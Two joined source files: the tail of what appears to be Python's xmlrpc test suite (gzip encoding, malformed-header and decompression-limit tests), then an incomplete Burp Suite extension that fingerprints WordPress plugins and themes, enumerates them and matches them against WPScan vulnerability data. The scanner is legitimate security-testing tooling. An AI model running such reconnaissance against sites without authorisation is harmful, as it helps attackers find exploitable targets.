#add a lone gzip header to induce decode error remotely
connection.putheader("Content-Encoding", "gzip")
return xmlrpclib.Transport.send_content(self, connection, body)
def setUp(self):
BaseServerTestCase.setUp(self)
def test_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
p = xmlrpclib.ServerProxy(URL, transport=t)
self.assertEqual(p.pow(6,8), 6**8)
a = self.RequestHandler.content_length
t.encode_threshold = 0 #turn on request encoding
self.assertEqual(p.pow(6,8), 6**8)
b = self.RequestHandler.content_length
self.assertTrue(a>b)
p("close")()
def test_bad_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
t.fake_gzip = True
p = xmlrpclib.ServerProxy(URL, transport=t)
cm = self.assertRaisesRegex(xmlrpclib.ProtocolError,
re.compile(r"\b400\b"))
with cm:
p.pow(6, 8)
p("close")()
def test_gzip_response(self):
t = self.Transport()
p = xmlrpclib.ServerProxy(URL, transport=t)
old = self.requestHandler.encode_threshold
self.requestHandler.encode_threshold = None #no encoding
self.assertEqual(p.pow(6,8), 6**8)
a = t.response_length
self.requestHandler.encode_threshold = 0 #always encode
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
b = t.response_length
self.requestHandler.encode_threshold = old
self.assertTrue(a>b)
@unittest.skipIf(gzip is None, 'requires gzip')
class GzipUtilTestCase(unittest.TestCase):
def test_gzip_decode_limit(self):
max_gzip_decode = 20 * 1024 * 1024
data = b'\0' * max_gzip_decode
encoded = xmlrpclib.gzip_encode(data)
decoded = xmlrpclib.gzip_decode(encoded)
self.assertEqual(len(decoded), max_gzip_decode)
data = b'\0' * (max_gzip_decode + 1)
encoded = xmlrpclib.gzip_encode(data)
with self.assertRaisesRegex(ValueError,
"max gzipped payload length exceeded"):
xmlrpclib.gzip_decode(encoded)
xmlrpclib.gzip_decode(encoded, max_decode=-1)
class HeadersServerTestCase(BaseServerTestCase):
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
test_headers = None
def do_POST(self):
self.__class__.test_headers = self.headers
return super().do_POST()
requestHandler = RequestHandler
standard_headers = [
'Host', 'Accept-Encoding', 'Content-Type', 'User-Agent',
'Content-Length']
def setUp(self):
self.RequestHandler.test_headers = None
return super().setUp()
def assertContainsAdditionalHeaders(self, headers, additional):
expected_keys = sorted(self.standard_headers + list(additional.keys()))
self.assertListEqual(sorted(headers.keys()), expected_keys)
for key, value in additional.items():
self.assertEqual(headers.get(key), value)
def test_header(self):
p = xmlrpclib.ServerProxy(URL, headers=[('X-Test', 'foo')])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
def test_header_many(self):
p = xmlrpclib.ServerProxy(
URL, headers=[('X-Test', 'foo'), ('X-Test-Second', 'bar')])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(
headers, {'X-Test': 'foo', 'X-Test-Second': 'bar'})
def test_header_empty(self):
p = xmlrpclib.ServerProxy(URL, headers=[])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {})
def test_header_tuple(self):
p = xmlrpclib.ServerProxy(URL, headers=(('X-Test', 'foo'),))
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
def test_header_items(self):
p = xmlrpclib.ServerProxy(URL, headers={'X-Test': 'foo'}.items())
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
#Test special attributes of the ServerProxy object
class ServerProxyTestCase(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
# Actual value of the URL doesn't matter if it is a string in
# the correct format.
self.url = 'http://fake.localhost'
def test_close(self):
p = xmlrpclib.ServerProxy(self.url)
self.assertEqual(p('close')(), None)
def test_transport(self):
t = xmlrpclib.Transport()
p = xmlrpclib.ServerProxy(self.url, transport=t)
self.assertEqual(p('transport'), t)
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(http.client.HTTPMessage):
def get(self, key, failobj=None):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return super().get(key, failobj)
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
thread = threading.Thread(target=http_server, args=serv_args)
thread.start()
self.addCleanup(thread.join)
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
default_class = http.client.HTTPMessage
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = default_class
def test_basic(self):
# check that flag is false by default
flagval = xmlrpc.server.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("X-exception"), expected_err)
self.assertTrue(e.headers.get("X-traceback") is not None)
else:
self.fail('ProtocolError not raised')
@contextlib.contextmanager
def captured_stdout(encoding='utf-8'):
"""A variation on support.captured_stdout() which gives a text stream
having a `buffer` attribute.
"""
orig_stdout = sys.stdout
sys.stdout = io.TextIOWrapper(io.BytesIO(), encoding=encoding)
try:
yield sys.stdout
finally:
sys.stdout = orig_stdout
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = xmlrpc.server.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
with os_helper.EnvironmentVarGuard() as env:
env['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
with captured_stdout(encoding=self.cgi.encoding) as data_out:
self.cgi.handle_request()
# parse Status header
data_out.seek(0)
handle = data_out.read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
with os_helper.EnvironmentVarGuard() as env, \
captured_stdout(encoding=self.cgi.encoding) as data_out, \
support.captured_stdin() as data_in:
data_in.write(data)
data_in.seek(0)
env['CONTENT_LENGTH'] = str(len(data))
self.cgi.handle_request()
data_out.seek(0)
# will respond exception, if so, our goal is achieved ;)
handle = data_out.read()
# start with 44th char so as not to get http header, we just
# need only xml
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
# Also test the content-length returned by handle_request
# Using the same test method inorder to avoid all the datapassing
# boilerplate code.
# Test for bug: http://bugs.python.org/issue5040
content = handle[handle.find("<?xml"):]
self.assertEqual(
int(re.search(r'Content-Length: (\d+)', handle).group(1)),
len(content))
class UseBuiltinTypesTestCase(unittest.TestCase):
def test_use_builtin_types(self):
# SimpleXMLRPCDispatcher.__init__ accepts use_builtin_types, which
# makes all dispatch of binary data as bytes instances, and all
# dispatch of datetime argument as datetime.datetime instances.
self.log = []
expected_bytes = b"my dog has fleas"
expected_date = datetime.datetime(2008, 5, 26, 18, 25, 12)
marshaled = xmlrpclib.dumps((expected_bytes, expected_date), 'foobar')
def foobar(*args):
self.log.extend(args)
handler = xmlrpc.server.SimpleXMLRPCDispatcher(
allow_none=True, encoding=None, use_builtin_types=True)
handler.register_function(foobar)
handler._marshaled_dispatch(marshaled)
self.assertEqual(len(self.log), 2)
mybytes, mydate = self.log
self.assertEqual(self.log, [expected_bytes, expected_date])
self.assertIs(type(mydate), datetime.datetime)
self.assertIs(type(mybytes), bytes)
def test_cgihandler_has_use_builtin_types_flag(self):
handler = xmlrpc.server.CGIXMLRPCRequestHandler(use_builtin_types=True)
self.assertTrue(handler.use_builtin_types)
def test_xmlrpcserver_has_use_builtin_types_flag(self):
server = xmlrpc.server.SimpleXMLRPCServer(("localhost", 0),
use_builtin_types=True)
server.server_close()
self.assertTrue(server.use_builtin_types)
@threading_helper.reap_threads
def test_main():
support.run_unittest(XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase, UseBuiltinTypesTestCase,
SimpleServerTestCase, SimpleServerEncodingTestCase,
KeepaliveServerTestCase1, KeepaliveServerTestCase2,
GzipServerTestCase, GzipUtilTestCase, HeadersServerTestCase,
MultiPathServerTestCase, ServerProxyTestCase, FailingServerTestCase,
CGIHandlerTestCase, SimpleXMLRPCDispatcherTestCase)
if __name__ == "__main__":
test_main()
|
burp_wp.py
|
# ____ _ _ ____ ____ __ ______
# | __ )| | | | _ \| _ \ \ \ / / _ \
# | _ \| | | | |_) | |_) | \ \ /\ / /| |_) |
# | |_) | |_| | _ <| __/ \ V V / | __/
# |____/ \___/|_| \_\_| \_/\_/ |_|
#
# MIT License
#
# Copyright (c) 2018 Kacper Szurek
import collections
import hashlib
import json
import os
import re
import shutil
import threading
import time
import traceback
import urlparse
from array import array
from base64 import b64encode, b64decode
from collections import defaultdict
from distutils.version import LooseVersion
from itertools import chain
from threading import Lock
from burp import IBurpExtender
from burp import IBurpExtenderCallbacks
from burp import IContextMenuFactory
from burp import IHttpListener
from burp import IIntruderPayloadGenerator
from burp import IIntruderPayloadGeneratorFactory
from burp import IMessageEditorController
from burp import IParameter
from burp import IScanIssue
from burp import ITab
from burp import IScannerCheck
from java.awt import Component
from java.awt import Cursor
from java.awt import Desktop
from java.awt import Dimension
from java.awt.event import ActionListener
from java.awt.event import ItemEvent
from java.awt.event import ItemListener
from java.awt.event import MouseAdapter
from java.net import URL, URI
from java.security import KeyFactory
from java.security import Signature
from java.security.spec import X509EncodedKeySpec
from java.util import ArrayList
from javax.swing import BoxLayout
from javax.swing import JButton
from javax.swing import JCheckBox
from javax.swing import JComboBox
from javax.swing import JEditorPane
from javax.swing import JFileChooser
from javax.swing import JLabel
from javax.swing import JMenuItem
from javax.swing import JOptionPane
from javax.swing import JPanel
from javax.swing import JProgressBar
from javax.swing import JScrollPane
from javax.swing import JSplitPane
from javax.swing import JTabbedPane
from javax.swing import JTable
from javax.swing import JTextField
from javax.swing.event import DocumentListener
from javax.swing.table import AbstractTableModel
from org.python.core.util import StringUtil
BURP_WP_VERSION = '0.2'
INTERESTING_CODES = [200, 401, 403, 301]
DB_NAME = "burp_wp_database.db"
class BurpExtender(IBurpExtender, IHttpListener, ITab, IContextMenuFactory, IMessageEditorController, IScannerCheck):
config = {}
def print_debug(self, message):
if self.config.get('debug', False):
self.callbacks.printOutput(message)
def registerExtenderCallbacks(self, callbacks):
self.callbacks = callbacks
self.callbacks.printOutput("WordPress Scanner version {}".format(BURP_WP_VERSION))
self.helpers = callbacks.getHelpers()
self.initialize_config()
self.callbacks.setExtensionName("WordPress Scanner")
# createMenuItems
self.callbacks.registerContextMenuFactory(self)
# processHttpMessage
self.callbacks.registerHttpListener(self)
self.callbacks.registerIntruderPayloadGeneratorFactory(IntruderPluginsGenerator(self))
self.callbacks.registerIntruderPayloadGeneratorFactory(IntruderThemesGenerator(self))
self.callbacks.registerIntruderPayloadGeneratorFactory(IntruderPluginsThemesGenerator(self))
# doPassiveScan
self.callbacks.registerScannerCheck(self)
self.initialize_variables()
self.initialize_gui()
# getTabCaption, getUiComponent
# This must be AFTER panel_main initialization
self.callbacks.addSuiteTab(self)
self.initialize_database()
def initialize_config(self):
temp_config = self.callbacks.loadExtensionSetting("config")
if temp_config and len(temp_config) > 10:
try:
self.config = json.loads(b64decode(temp_config))
self.print_debug("[+] initialize_config configuration: {}".format(self.config))
except:
self.print_debug("[-] initialize_config cannot load configuration: {}".format(traceback.format_exc()))
else:
self.print_debug("[+] initialize_config new configuration")
self.config = {'active_scan': True, 'database_path': os.path.join(os.getcwd(), DB_NAME),
'wp_content': 'wp-content', 'full_body': False, 'all_vulns': False, 'scan_type': 1,
'debug': False, 'auto_update': True, 'last_update': 0, 'sha_plugins': '', 'sha_themes': '',
'sha_admin_ajax': '', 'print_info': False, 'admin_ajax': True, 'update_burp_wp': '0'}
def initialize_variables(self):
self.is_burp_pro = True if "Professional" in self.callbacks.getBurpVersion()[0] else False
self.regexp_version_number = re.compile("ver=([0-9.]+)", re.IGNORECASE)
self.regexp_stable_tag = re.compile(r"(?:stable tag|version):\s*(?!trunk)([0-9a-z.-]+)", re.IGNORECASE)
self.regexp_version_from_changelog = re.compile(
r"[=]+\s+(?:v(?:ersion)?\s*)?([0-9.-]+)[ \ta-z0-9().\-,]*[=]+",
re.IGNORECASE)
self.list_issues = ArrayList()
self.lock_issues = Lock()
self.lock_update_database = Lock()
self.database = {'plugins': collections.OrderedDict(), 'themes': collections.OrderedDict(), 'admin_ajax': {}}
self.list_plugins_on_website = defaultdict(list)
def initialize_gui(self):
class CheckboxListener(ItemListener):
def __init__(self, extender, name):
self.extender = extender
self.name = name
def itemStateChanged(self, e):
if e.getStateChange() == ItemEvent.SELECTED:
self.extender.update_config(self.name, True)
else:
self.extender.update_config(self.name, False)
class ComboboxListener(ActionListener):
def __init__(self, extender, name):
self.extender = extender
self.name = name
def actionPerformed(self, action_event):
selected = self.extender.combobox_scan_type.getSelectedItem().get_key()
self.extender.update_config(self.name, selected)
class TextfieldListener(DocumentListener):
def __init__(self, extender):
self.extender = extender
def changedUpdate(self, document):
self._do(document)
def removeUpdate(self, document):
self._do(document)
def insertUpdate(self, document):
self._do(document)
def _do(self, document):
wp_content = self.extender.textfield_wp_content.getText().replace("/", "")
self.extender.update_config('wp_content', wp_content)
class CopyrightMouseAdapter(MouseAdapter):
def __init__(self, url):
self.url = URI.create(url)
def mouseClicked(self, event):
if Desktop.isDesktopSupported() and Desktop.getDesktop().isSupported(Desktop.Action.BROWSE):
try:
Desktop.getDesktop().browse(self.url)
except:
self._print_debug("[-] CopyrightMouseAdapter: {}".format(traceback.format_exc()))
class ComboboxItem:
def __init__(self, key, val):
self._key = key
self._val = val
def get_key(self):
return self._key
# Set label inside ComboBox
def __repr__(self):
return self._val
panel_upper = JPanel()
panel_upper.setLayout(BoxLayout(panel_upper, BoxLayout.Y_AXIS))
panel_update = JPanel()
panel_update.setLayout(BoxLayout(panel_update, BoxLayout.X_AXIS))
panel_update.setAlignmentX(Component.LEFT_ALIGNMENT)
self.button_update = JButton("Update", actionPerformed=self.button_update_on_click)
self.button_update.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_update.add(self.button_update)
self.progressbar_update = JProgressBar()
self.progressbar_update.setMaximumSize(self.progressbar_update.getPreferredSize())
self.progressbar_update.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_update.add(self.progressbar_update)
self.label_update = JLabel()
self.label_update.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_update.add(self.label_update)
panel_upper.add(panel_update)
checkbox_active_scan = JCheckBox("Use readme.txt for detecting plugins version. This option sends additional request to website",
self.config.get('active_scan', False))
checkbox_active_scan.addItemListener(CheckboxListener(self, "active_scan"))
panel_upper.add(checkbox_active_scan)
checkbox_full_body = JCheckBox("Scan full response body (normally we check only URL)",
self.config.get('full_body', False))
checkbox_full_body.addItemListener(CheckboxListener(self, "full_body"))
panel_upper.add(checkbox_full_body)
checkbox_all_vulns = JCheckBox("Print all plugin vulnerabilities regarding detected version",
self.config.get('all_vulns', False))
checkbox_all_vulns.addItemListener(CheckboxListener(self, "all_vulns"))
panel_upper.add(checkbox_all_vulns)
checkbox_print_info = JCheckBox(
"Print info about discovered plugins even if they don't have known vulnerabilities",
self.config.get('print_info', False))
checkbox_print_info.addItemListener(CheckboxListener(self, "print_info"))
panel_upper.add(checkbox_print_info)
checkbox_admin_ajax = JCheckBox(
"Discover plugins using wp-ajax.php?action= technique",
self.config.get('admin_ajax', True))
checkbox_admin_ajax.addItemListener(CheckboxListener(self, "admin_ajax"))
panel_upper.add(checkbox_admin_ajax)
checkbox_auto_update = JCheckBox("Enable auto update", self.config.get('auto_update', True))
checkbox_auto_update.addItemListener(CheckboxListener(self, "auto_update"))
panel_upper.add(checkbox_auto_update)
checkbox_debug = JCheckBox("Enable debug mode", self.config.get('debug', False))
checkbox_debug.addItemListener(CheckboxListener(self, "debug"))
panel_upper.add(checkbox_debug)
panel_what_detect = JPanel()
panel_what_detect.setLayout(BoxLayout(panel_what_detect, BoxLayout.X_AXIS))
panel_what_detect.setAlignmentX(Component.LEFT_ALIGNMENT)
label_what_detect = JLabel("What detect: ")
label_what_detect.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_what_detect.add(label_what_detect)
self.combobox_scan_type = JComboBox()
self.combobox_scan_type.addItem(ComboboxItem(1, "Plugins and Themes"))
self.combobox_scan_type.addItem(ComboboxItem(2, "Only plugins"))
self.combobox_scan_type.addItem(ComboboxItem(3, "Only themes"))
self.combobox_scan_type.addActionListener(ComboboxListener(self, "scan_type"))
self.combobox_scan_type.setMaximumSize(Dimension(200, 30))
self.combobox_scan_type.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_what_detect.add(self.combobox_scan_type)
label_wp_content = JLabel("Custom wp-content:")
label_wp_content.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_what_detect.add(label_wp_content)
self.textfield_wp_content = JTextField(self.config.get('wp_content', 'wp-content'))
self.textfield_wp_content.getDocument().addDocumentListener(TextfieldListener(self))
self.textfield_wp_content.setMaximumSize(Dimension(250, 30))
self.textfield_wp_content.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_what_detect.add(self.textfield_wp_content)
panel_upper.add(panel_what_detect)
panel_choose_file = JPanel()
panel_choose_file.setLayout(BoxLayout(panel_choose_file, BoxLayout.X_AXIS))
panel_choose_file.setAlignmentX(Component.LEFT_ALIGNMENT)
label_database_path = JLabel("Database path: ")
label_database_path.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_choose_file.add(label_database_path)
button_choose_file = JButton("Choose file", actionPerformed=self.button_choose_file_on_click)
button_choose_file.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_choose_file.add(button_choose_file)
self.textfield_database_path = JTextField(self.config.get('database_path', DB_NAME))
self.textfield_database_path.setEditable(False)
self.textfield_database_path.setMaximumSize(Dimension(250, 30))
self.textfield_database_path.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_choose_file.add(self.textfield_database_path)
panel_upper.add(panel_choose_file)
panel_buttons = JPanel()
panel_buttons.setLayout(BoxLayout(panel_buttons, BoxLayout.X_AXIS))
panel_buttons.setAlignmentX(Component.LEFT_ALIGNMENT)
button_clear_issues = JButton("Clear issues list", actionPerformed=self.button_clear_issues_on_click)
panel_buttons.add(button_clear_issues)
button_force_update = JButton("Force update", actionPerformed=self.button_force_update_on_click)
panel_buttons.add(button_force_update)
button_reset_to_default = JButton("Reset settings to default",
actionPerformed=self.button_reset_to_default_on_click)
panel_buttons.add(button_reset_to_default)
panel_upper.add(panel_buttons)
panel_copyright = JPanel()
panel_copyright.setLayout(BoxLayout(panel_copyright, BoxLayout.X_AXIS))
panel_copyright.setAlignmentX(Component.LEFT_ALIGNMENT)
label_copyright1 = JLabel("<html><a href='#/'>WordPress Scanner {}</a></html>".format(BURP_WP_VERSION))
label_copyright1.setAlignmentX(Component.LEFT_ALIGNMENT)
label_copyright1.setCursor(Cursor(Cursor.HAND_CURSOR))
label_copyright1.addMouseListener(CopyrightMouseAdapter("https://github.com/kacperszurek/burp_wp"))
label_copyright1.setMaximumSize(label_copyright1.getPreferredSize())
panel_copyright.add(label_copyright1)
label_copyright2 = JLabel("<html> by <a href='#'>Kacper Szurek</a>.</html>")
label_copyright2.setAlignmentX(Component.LEFT_ALIGNMENT)
label_copyright2.setCursor(Cursor(Cursor.HAND_CURSOR))
label_copyright2.addMouseListener(CopyrightMouseAdapter("https://security.szurek.pl/"))
label_copyright2.setMaximumSize(label_copyright2.getPreferredSize())
panel_copyright.add(label_copyright2)
label_copyright3 = JLabel(
"<html> Vulnerabilities database by <a href='#/'>WPScan</a></html>")
label_copyright3.setAlignmentX(Component.LEFT_ALIGNMENT)
label_copyright3.setCursor(Cursor(Cursor.HAND_CURSOR))
label_copyright3.addMouseListener(CopyrightMouseAdapter("https://wpscan.org/"))
panel_copyright.add(label_copyright3)
panel_upper.add(panel_copyright)
self.table_issues = IssuesTableModel(self)
table_issues_details = IssuesDetailsTable(self, self.table_issues)
table_issues_details.setAutoCreateRowSorter(True)
panel_center = JScrollPane(table_issues_details)
self.panel_bottom = JTabbedPane()
self.panel_bottom_request1 = self.callbacks.createMessageEditor(self, True)
self.panel_bottom_response1 = self.callbacks.createMessageEditor(self, True)
self.panel_bottom_request2 = self.callbacks.createMessageEditor(self, True)
self.panel_bottom_response2 = self.callbacks.createMessageEditor(self, True)
self.panel_bottom_advisory = JEditorPane()
self.panel_bottom_advisory.setEditable(False)
self.panel_bottom_advisory.setEnabled(True)
self.panel_bottom_advisory.setContentType("text/html")
self.panel_bottom.addTab("Advisory", JScrollPane(self.panel_bottom_advisory))
self.panel_bottom.addTab("Request 1", JScrollPane(self.panel_bottom_request1.getComponent()))
self.panel_bottom.addTab("Response 1", JScrollPane(self.panel_bottom_response1.getComponent()))
self.panel_bottom.addTab("Request 2", JScrollPane(self.panel_bottom_request2.getComponent()))
self.panel_bottom.addTab("Response 2", JScrollPane(self.panel_bottom_response2.getComponent()))
split_panel_upper = JSplitPane(JSplitPane.VERTICAL_SPLIT, panel_upper, panel_center)
self.panel_main = JSplitPane(JSplitPane.VERTICAL_SPLIT, split_panel_upper, self.panel_bottom)
def initialize_database(self):
last_update = time.strftime("%d-%m-%Y %H:%M", time.localtime(self.config.get('last_update', 0)))
update_started = False
if self.config.get('auto_update', True):
if (self.config.get('last_update', 0) + (60 * 60 * 24)) < int(time.time()):
self.print_debug("[*] initialize_database Last check > 24h")
self.button_update_on_click(None)
update_started = True
else:
self.print_debug("[*] initialize_database last update: {}".format(last_update))
database_path = self.config.get('database_path', DB_NAME)
self.print_debug("[*] initialize_database database path: {}".format(database_path))
if os.path.exists(database_path):
try:
with open(database_path, "rb") as fp:
self.database = json.load(fp)
themes_length = len(self.database['themes'])
plugins_length = len(self.database['plugins'])
admin_ajax_length = len(self.database.get('admin_ajax', {}))
update_text = "Themes: {}, Plugins: {}, Admin ajax: {}, Last update: {}".format(themes_length, plugins_length, admin_ajax_length,
last_update)
self.label_update.setText(update_text)
except Exception as e:
self.label_update.setText("Cannot load database: {}".format(e))
self.print_debug("[-] initialize_database cannot load database: {}".format(traceback.format_exc()))
if not update_started:
self.button_force_update_on_click(None)
else:
self.print_debug("[-] initialize_database database does not exist")
if not update_started:
self.button_force_update_on_click(None)
def button_force_update_on_click(self, msg):
self.print_debug("[+] button_force_update_on_click")
self.update_config('sha_plugins', '')
self.update_config('sha_themes', '')
self.button_update_on_click(None)
def button_reset_to_default_on_click(self, msg):
self.print_debug("[+] button_reset_to_default_on_click")
self.callbacks.saveExtensionSetting("config", "")
JOptionPane.showMessageDialog(self.panel_main, "Please reload extension")
self.callbacks.unloadExtension()
def clear_issues(self):
if not self.lock_issues.acquire(False):
self.print_debug("[*] clear_issues cannot acquire lock")
return
try:
self.print_debug("[+] clear_issues lock acquired")
row = self.list_issues.size()
if row > 0:
self.list_issues.clear()
self.table_issues.fireTableRowsDeleted(0, (row-1))
self.panel_bottom_advisory.setText("")
self.panel_bottom_request1.setMessage("", True)
self.panel_bottom_response1.setMessage("", False)
self.panel_bottom_request2.setMessage("", True)
self.panel_bottom_response2.setMessage("", False)
self.list_plugins_on_website.clear()
except:
self.print_debug("[+] clear_issues error: {}".format(traceback.format_exc()))
finally:
self.lock_issues.release()
self.print_debug("[+] clear_issues lock release")
def button_clear_issues_on_click(self, msg):
self.print_debug("[+] button_clear_issues_on_click")
threading.Thread(target=self.clear_issues).start()
def button_update_on_click(self, msg):
threading.Thread(target=self.update_database_wrapper).start()
def button_choose_file_on_click(self, msg):
file_chooser = JFileChooser()
return_value = file_chooser.showSaveDialog(self.panel_main)
if return_value == JFileChooser.APPROVE_OPTION:
selected_file = file_chooser.getSelectedFile()
old_file_path = self.config.get('database_path', DB_NAME)
file_path = selected_file.getPath()
if file_path == old_file_path:
self.print_debug("[+] button_choose_file_on_click the same database file")
return
if selected_file.exists():
try:
with open(file_path, "rb") as fp:
temp_load = json.load(fp)
if "themes" in temp_load and "plugins" in temp_load:
self.database = temp_load
self.textfield_database_path.setText(file_path)
self.update_config('database_path', file_path)
self.update_config('last_update', int(time.time()))
self.print_debug("[+] button_choose_file_on_click offline database installed")
return
except:
self.print_debug("[+] button_choose_file_on_click cannot load offline database: {}".format(
traceback.format_exc()))
result = JOptionPane.showConfirmDialog(self.panel_main, "The file exists, overwrite?", "Existing File",
JOptionPane.YES_NO_OPTION)
if result != JOptionPane.YES_OPTION:
return
self.textfield_database_path.setText(file_path)
self.print_debug("[+] button_choose_file_on_click new database path, force update")
self.update_config('database_path', file_path)
self.button_force_update_on_click(None)
def update_config(self, key, val):
try:
self.config[key] = val
temp_config = b64encode(json.dumps(self.config, ensure_ascii=False))
self.callbacks.saveExtensionSetting("config", temp_config)
self.print_debug("[+] Config updated for key {}".format(key))
if key == "last_update":
last_update = time.strftime("%d-%m-%Y %H:%M", time.localtime(self.config.get('last_update', 0)))
themes_length = len(self.database['themes'])
plugins_length = len(self.database['plugins'])
admin_ajax_length = len(self.database.get('admin_ajax', {}))
update_text = "Themes: {}, Plugins: {}, Admin ajax: {}, Last update: {}".format(themes_length, plugins_length, admin_ajax_length,
last_update)
self.label_update.setText(update_text)
self.print_debug("[*] {}".format(update_text))
except:
self.print_debug("[-] update_config: {}".format(traceback.format_exc()))
def update_database_wrapper(self):
if not self.lock_update_database.acquire(False):
self.print_debug("[*] update_database update already running")
return
try:
self.button_update.setEnabled(False)
self.print_debug("[+] update_database update started")
if self._update_database():
try:
with open(self.config.get('database_path'), "wb") as fp:
json.dump(self.database, fp)
self.update_config('last_update', int(time.time()))
except:
self.print_debug("[-] update_database cannot save database: {}".format(traceback.format_exc()))
return
self.print_debug("[+] update_database update finish")
except:
self.print_debug("[+] update_database update error")
finally:
self.lock_update_database.release()
self.progressbar_update.setValue(100)
self.progressbar_update.setStringPainted(True)
self.button_update.setEnabled(True)
def _make_http_request_wrapper(self, original_url):
try:
java_url = URL(original_url)
request = self.helpers.buildHttpRequest(java_url)
response = self.callbacks.makeHttpRequest(java_url.getHost(), 443, True, request)
response_info = self.helpers.analyzeResponse(response)
if response_info.getStatusCode() in INTERESTING_CODES:
return self.helpers.bytesToString(response)[response_info.getBodyOffset():].encode("latin1")
else:
self.print_debug("[-] _make_http_request_wrapper request failed")
return None
except:
self.print_debug("[-] _make_http_request_wrapper failed: {}".format(traceback.format_exc()))
return None
def _update_database(self):
dict_files = {'plugins': 'https://data.wpscan.org/plugins.json',
'themes': 'https://data.wpscan.org/themes.json',
'admin_ajax': 'https://raw.githubusercontent.com/kacperszurek/burp_wp/master/data/admin_ajax.json'}
progress_divider = len(dict_files) * 2
progress_adder = 0
for _type, url in dict_files.iteritems():
try:
temp_database = collections.OrderedDict()
sha_url = "{}.sha512".format(url)
sha_original = self._make_http_request_wrapper(sha_url)
if not sha_original:
return False
if self.config.get('sha_{}'.format(_type), '') == sha_original:
self.print_debug('[*] _update_database the same hash for {}, skipping update'.format(_type))
progress_adder += int(100 / len(dict_files))
continue
self.progressbar_update.setValue(int(100/progress_divider)+progress_adder)
self.progressbar_update.setStringPainted(True)
downloaded_data = self._make_http_request_wrapper(url)
if not downloaded_data:
return False
hash_sha512 = hashlib.sha512()
hash_sha512.update(downloaded_data)
downloaded_sha = hash_sha512.hexdigest()
if sha_original != downloaded_sha:
self.print_debug(
"[-] _update_database hash mismatch for {}, should be: {} is: {}".format(_type, sha_original,
downloaded_sha))
return False
try:
loaded_json = json.loads(downloaded_data)
except:
self.print_debug(
"[-] _update_database cannot decode json for {}: {}".format(_type, traceback.format_exc()))
return False
if _type == 'admin_ajax':
temp_database = loaded_json
else:
i = 0
progress_adder += int(100 / progress_divider)
json_length = len(loaded_json)
for name in loaded_json:
bugs = []
i += 1
if i % 1000 == 0:
percent = int((i * 100. / json_length) / 4) + progress_adder
self.progressbar_update.setValue(percent)
self.progressbar_update.setStringPainted(True)
